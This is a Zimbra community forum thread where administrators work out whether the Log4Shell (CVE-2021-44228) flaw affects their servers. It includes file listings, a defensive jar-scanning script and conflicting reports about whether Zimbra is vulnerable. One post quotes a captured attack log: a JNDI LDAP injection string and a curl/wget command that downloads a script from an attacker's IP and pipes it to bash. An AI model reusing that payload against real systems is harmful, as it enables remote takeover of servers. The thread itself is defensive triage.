log4j-zero-day exploit - active attacks
Hi
Need confirmation. Zimbra uses log4j, and now I got an alert from a CVE with threat 10/10.
Is Zimbra affected, and if yes, to what extent and which versions of Zimbra servers are affected?
https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging
About the exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"
https://www.bleepingcomputer.com/news/s ... nightmare/
How this works:
https://www.lunasec.io/docs/blog/log4j-zero-day/
- JDunphy
- Outstanding Member
- Posts: 945
- Joined: Fri Sep 12, 2014 11:18 pm
- Location: Victoria, BC
- ZCS/ZD Version: 9.0.0_P44 NETWORK Edition
Re: log4j-zero-day exploit - active attacks
I have been through this today and think we are ok, but would be interested if others believe otherwise. Zimbra, could you guys comment?
It appears to be versions log4j 2.0-beta9 through 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:
Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
List of attacking IPs for ipsets, etc. GreyNoise is providing these in real time: IPs that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv
Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/
Jim
- Advanced member
- Posts: 60
- Joined: Fri Sep 12, 2014 10:27 pm
- ZCS/ZD Version: 9.0.0 Patch 40 RHEL
Re: log4j-zero-day exploit - active attacks
This post on the Confluence community also suggests version 1.x is not vulnerable to the JNDI exploit, but I can't verify that.
Looking for log4j, all I can see is:
# find / -name '*log4j*'
/opt/zimbra/common/jetty_home/modules/logging-log4j.mod
/opt/zimbra/common/jetty_home/modules/logging-log4j2.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j2.mod
/opt/zimbra/common/jetty_home/modules/log4j2-slf4j.mod
/opt/zimbra/common/jetty_home/modules/log4j-impl
/opt/zimbra/common/jetty_home/modules/log4j-impl/resources/log4j.xml
/opt/zimbra/common/jetty_home/modules/log4j-impl.mod
/opt/zimbra/common/jetty_home/modules/log4j2-api.mod
/opt/zimbra/common/jetty_home/modules/log4j2-impl
/opt/zimbra/common/jetty_home/modules/log4j2-impl/resources/log4j2.xml
/opt/zimbra/common/jetty_home/modules/log4j2-impl.mod
/opt/zimbra/conf/log4j.properties.in
/opt/zimbra/conf/milter.log4j.properties
/opt/zimbra/conf/zmconfigd.log4j.properties
/opt/zimbra/conf/log4j.properties
/opt/zimbra/lib/jars/apache-log4j-extras-1.0.jar
/opt/zimbra/lib/jars/slf4j-log4j12-1.7.30.jar
/opt/zimbra/lib/jars/log4j-1.2.16.jar
/opt/zimbra/lib/jars/syslog4j-0.9.46.jar
/opt/zimbra/log/zmconfigd-log4j.log
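As an added defender-side check (not from the thread and not Zimbra's tooling), this script does what the find above does by hand: for each log4j jar under a root it reads the version out of the filename and tests whether the jar embeds the Log4j 2.x JndiLookup class, the component that the 2.0-beta9 to 2.14.1 advisory is about. The jars it builds are constructed stand-ins with dummy bytes, named after the real files in the listing. A 1.x jar such as log4j-1.2.16.jar comes back without the class, which is why this check alone cannot settle the 1.x question the thread goes on to debate.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# The JNDI lookup class of Log4j 2.x. It ships in the log4j-core jars of
# 2.0-beta9..2.14.1 and does not exist in any 1.x jar (1.x has no such lookup).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Version from names like log4j-1.2.16.jar, log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar.
VERSION_RE = re.compile(r"log4j(?:-[a-z]+)?-(\d+\.\d+(?:\.\d+)?(?:-\w+)?)\.jar$", re.I)

def inspect_jar(path):
    """Return (version or None, True if the jar embeds JndiLookup.class)."""
    m = VERSION_RE.search(path.name)
    with zipfile.ZipFile(path) as zf:
        has_lookup = JNDI_LOOKUP_CLASS in zf.namelist()
    return (m.group(1) if m else None), has_lookup

def scan(root):
    """Map every *log4j*.jar under root to its (version, has_jndi_lookup) pair."""
    return {p.name: inspect_jar(p) for p in Path(root).rglob("*log4j*.jar")}

def build_sample_tree(root):
    """Constructed stand-ins for jars seen on a Zimbra box; entries are dummy bytes."""
    lib = Path(root) / "opt" / "zimbra" / "lib" / "jars"
    lib.mkdir(parents=True)
    with zipfile.ZipFile(lib / "log4j-1.2.16.jar", "w") as zf:
        zf.writestr("org/apache/log4j/Logger.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(lib / "apache-log4j-extras-1.0.jar", "w") as zf:
        zf.writestr("org/apache/log4j/rolling/RollingFileAppender.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(lib / "log4j-core-2.14.1.jar", "w") as zf:  # hypothetical 2.x jar
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return lib

def demo():
    """Build the sample tree in a temp dir, scan it and return {name: (version, has_lookup)}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan(tmp)

if __name__ == "__main__":
    for name, (ver, lookup) in sorted(demo().items()):
        state = "PRESENT" if lookup else "absent"
        print(f"{name:32s} version={ver!s:10s} JndiLookup={state}")
```

Point `scan()` at `/` or `/opt/zimbra` on a real host; a jar that reports the class present and a version in the advisory range is the one to act on.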
Re: log4j-zero-day exploit - active attacks
Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And I'm checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I'm waiting for the VMware KB to be updated and for patches.
I have an old Zimbra running also:
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And I wonder whether that version is affected. Can anyone point me somewhere I could find some more details?
Thanks.
- Advanced member
- Posts: 60
- Joined: Fri Sep 12, 2014 10:27 pm
- ZCS/ZD Version: 9.0.0 Patch 40 RHEL
Re: log4j-zero-day exploit - active attacks
In Jim's link to the hashes above, they mention 1.x might be vulnerable too, with a link to this GitHub issue mentioning an avenue by which lookups could be triggered?
JDunphy wrote:
I have been through this today and think we are ok, but would be interested if others believe otherwise. Zimbra, could you guys comment?
It appears to be versions log4j 2.0-beta9 through 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:
Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
Jim
Re: log4j-zero-day exploit - active attacks
I have tested a Zimbra 8.7.11 Patch 11 and it looks vulnerable. Very easy attack vector.
irv wrote:
Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And I'm checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I'm waiting for the VMware KB to be updated and for patches.
I have an old Zimbra running also:
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And I wonder whether that version is affected. Can anyone point me somewhere I could find some more details?
Thanks.
(lib log4j-1.2.16.jar)
Re: log4j-zero-day exploit - active attacks
45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwg(......)}"
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash
I found that, so it looks like they are trying.
I think fail2ban on the firewall plus log monitoring can help temporarily to cut off those attacks.
Re: log4j-zero-day exploit - active attacks
sigtrap wrote:
I have tested a Zimbra 8.7.11 Patch 11 and it looks vulnerable. Very easy attack vector.
irv wrote:
Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And I'm checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I'm waiting for the VMware KB to be updated and for patches.
I have an old Zimbra running also:
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And I wonder whether that version is affected. Can anyone point me somewhere I could find some more details?
Thanks.
(lib log4j-1.2.16.jar)
Can confirm Zimbra 8.8.15_GA_4177 is vulnerable as well.
- L. Mark Stone
- Ambassador
- Posts: 2862
- Joined: Wed Oct 09, 2013 11:35 am
- Location: Portland, Maine, US
- ZCS/ZD Version: 10.0.13 Network Edition
- Contact:
Re: log4j-zero-day exploit - active attacks
I opened a Support Case with Zimbra on this earlier today. Zimbra have reported back to me that the 1.2.16 version of Log4j used by Zimbra is NOT subject to this exploit.
If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.
All the best,
Mark
___________________________________
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
AWS Certified Solutions Architect-Associate
Re: log4j-zero-day exploit - active attacks
I don't see an option to send you a PM. Might be because my account is new or something. I'm happy to send you the info to replicate it yourself.
L. Mark Stone wrote:
If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.